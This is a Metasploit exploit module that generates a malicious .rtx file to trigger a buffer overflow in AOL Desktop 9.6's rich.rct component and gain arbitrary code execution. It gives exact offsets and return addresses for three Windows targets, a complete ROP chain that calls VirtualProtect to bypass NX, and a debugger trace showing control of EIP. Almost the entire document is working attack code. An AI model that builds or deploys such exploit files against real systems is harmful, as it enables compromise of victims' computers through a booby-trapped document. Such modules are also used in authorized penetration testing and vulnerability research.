##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "AOL Desktop 9.6 RTX Buffer Overflow",
      'Description'    => %q{
          This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct
        component. By supplying a long string of data in the hyperlink tag, rich.rct copies
        this data into a buffer using a strcpy function, which causes an overflow, and
        results arbitrary code execution.
      },
      'License'	     => MSF_LICENSE,
      'Author'         =>
        [
          'sup3r',        #Initial disclosure, poc (9.5)
          'sickn3ss',     #9.6 poc
          'sinn3r',       #Metasploit
          'mr_me <steventhomasseeley[at]gmail.com>',  #NX bypass target
          'silent_dream', #Win 7 target
        ],
      'References'     =>
        [
          [ 'OSVDB', '70741'],
          [ 'EDB', '16085' ],
        ],
      'Payload'	     =>
        {
          'Space'           => 400,
          'BadChars'        => "\x00\x0d\x0a\x3e\x7f",
          'StackAdjustment' => -3500,
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "process",
        },
      'Platform'       => 'win',
      'Targets'	     =>
        [
          [
            'AOL Desktop 9.6 on Windows XP SP3',
            {
              'Ret'   => 0x01DB4542,  #0x01DB4542 JMP ESI
              'Offset'=> 5391,        #Offset to EIP
              'Max'   => 8000,        #Buffer max. Can be more.
            },
          ],
          [
            'AOL Desktop 9.6 on Windows XP SP3 - NX bypass',
            {
              'Ret'    => 0x6C02D216,  # PUSH ESI, POP ESP, POP ESI, POP EDI, POP EDI, RETN 8
              'vp'     => 0x7C801AD4,  # (kernel32.dll) => VirtualProtect()
              'Offset' => 5368,        # offset to rop
              'Max'    => 8000,        # Buffer max. Can be more.
            },
          ],
          [
            'AOL Desktop 9.6 on Windows 7',
            {
              'Ret'    => 0x63227D6D,  # JMP ESP in coolapi.dll
              'Offset' => 4327,        # Offset to EIP
              'Max'    => 8000,        # Buffer max. Can be more
            }
          ],
        ],
      'Privileged'	 => false,
      'DisclosureDate' => "Jan 31 2011",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new( 'FILENAME', [false, 'The filename', 'msf.rtx'] ),
        ]
      )
  end


  def exploit

    if target.name =~ /XP SP3$/

      # Compatible with what the poc has, and what I see on my debugger
      sploit  = ''
      sploit << rand_text_alpha(4968+7)
      sploit << payload.encoded
      sploit << rand_text_alpha(5368-sploit.length)
      sploit << make_nops(11)
      sploit << "\xe9\x70\xfe\xff\xff"  #JMP back 400 bytes
      sploit << [target.ret].pack('V')
      sploit << make_nops(target['Offset']-sploit.length-2)
      sploit << "\xeb\x04"
      sploit << [target.ret].pack('V')
      sploit << payload.encoded
      sploit << rand_text_alpha(target['Max']-sploit.length)

    elsif target.name =~ /SP3 - NX bypass$/

      #Thanks mr_me for the ROP chain

      rop = ''
      # This is the start of ESI
      rop << rand_text_alpha(4) # junk - > POP ESI
      rop << rand_text_alpha(4) # junk - > POP EDI
      rop << rand_text_alpha(4) # junk - > POP EDI
      rop << "\x66\x21\x5c\x63" # 0x635C2166 (appdata.dll) => POP ECX; RETN

      # Take control of the stack pointer right here (EIP)
      rop << [target.ret].pack('V') # junk - > RET 8 on the EIP pointer
      rop << rand_text_alpha(4) # junk - > RET 8 on the EIP pointer

      # Arg 4 of VirtualProtect() -> lpflOldProtect
      rop << "\x4c\x4b\x0e\x69" # 0x690E4B4C => RW addr -----------^^

      # Arg 2 of VirtualProtect() -> dwsize (0x212C) & setup EAX
      rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN
      rop << "\xfd\xc6\xb0\x6b" # 0x6BB0C6FD (imfdecode.rct) => MOV EAX,212C; POP EBX; RETN
      rop << rand_text_alpha(4) # junk -------------------------------------------^^
      rop << "\xf3\xdf\x4b\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBX; RETN

      # Arg 3 of VirtualProtect() -> lpflOldProtectflNewProtect (PAGE_EXECUTE_READWRITE)
      rop << "\xbb\x07\x98\x64" # 0x649807BB (abook.dll) => XCHG EAX,EDX; RETN
      rop << "\x9e\xe4\xc6\x68" # 0x68C6E49E (www.tol) ======> ADD EAX,10; POP EBP; RETN 4
      rop << rand_text_alpha(4) # junk --------------------------------------^^
      rop << "\xbb\x07\x98\x64" # 0x649807BB (ebook.dll) => XCHG EAX,EDX; RETN
      rop << rand_text_alpha(4) # junk ----------------------------------------------^^

      # Arg 1 of VirtualProtect() -> return address & lpAddress
      # Also, setup call to VirtualProtect() ptr in ESI
      rop << "\x3f\x7b\x1e\x67" # 0x671E7B3F (manager.dll) => PUSH ESP; POP EBP; RETN
      rop << "\x2c\x10\x49\x67" # 0x674BDFF3 (mip.tol) => XCHG EAX,EBP; RETN
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) => ADD EAX,0C; POP ESI; RETN
      rop << rand_text_alpha(4) # junk ---------------------------------^^
      rop << "\x2d\x95\x1d\x67" # 0x671D952D (mip.tol) ===========> ADD EAX,0C; POP ESI; RETN
      rop << [target['vp']].pack('V') # VirtualProtect() ----------------------------^^
      rop << "\x2c\x10\x49\x67" # 0x6749102C (mip.tol) => XCHG EAX,EBP; RETN

      # Continue safely, rop nop
      rop << "\xdb\x22\x94\x64" # 0x649422DB (manager.dll) ======> POP EDI; RETN
      rop << "\xdc\x22\x94\x64" # 0x649422DC (abook.dll) => RETN ----^^

      # gently place our code on the stack
      rop << "\x7e\x38\xa0\x60" # 0x60A0387E (abook.dll) ===> PUSHAD; RETN

      sploit = rand_text_alpha(target['Offset']-602) #688 was the original

      #mr_me's offset
      sploit << rop
      sploit << make_nops(74)
      sploit << payload.encoded

      #padding to the next offset
      sploit << rand_text_alpha(7)

      #the next offset
      sploit << rop
      sploit << make_nops(74)
      sploit << payload.encoded

      #Padding
      sploit << rand_text_alpha(target['Max']-sploit.length)

    elsif target.name =~ /Windows 7/

      #Thanks silent_dream

      sploit  = ''
      sploit << rand_text_alpha(target['Offset']-2-14)
      sploit << "\xeb\x13"
      sploit << make_nops(14)
      sploit << [target.ret].pack('V')
      sploit << make_nops(15)
      sploit << payload.encoded
      sploit << rand_text_alpha(target['Max'] - sploit.length)

    end

    link_value = rand_text_alpha(6)

    rtx  = "<HTML>"
    rtx << "<A HREF=\"#{sploit}\">#{link_value}</A>"
    rtx << "</HTML>"

    print_status("Creating #{datastore['FILENAME']}...")
    file_create(rtx)
  end
end

=begin
0:000> g
Breakpoint 0 hit
eax=00000006 ebx=06652370 ecx=02d9c898 edx=038d0000 esi=00000000 edi=02d99b30
eip=6909e187 esp=0022e638 ebp=0022e648 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
rich!ToolInit+0xed2c:
6909e187 e85cd50300      call    rich!ToolInit+0x4c28d (690db6e8)
0:000> g
(8d8.924): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02d38358 ecx=00000000 edx=00000030 esi=02d53cb8 edi=0022e7c4
eip=43434343 esp=0022e760 ebp=0022e780 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
43434343 ??              ???
0:000> dd esi
02d53cb8  43434343 43434343 43434343 43434343
02d53cc8  43434343 43434343 43434343 43434343
02d53cd8  43434343 43434343 43434343 43434343
02d53ce8  43434343 43434343 43434343 43434343
02d53cf8  43434343 43434343 43434343 43434343
02d53d08  43434343 43434343 43434343 43434343
02d53d18  43434343 43434343 43434343 43434343
02d53d28  43434343 43434343 43434343 43434343
=end
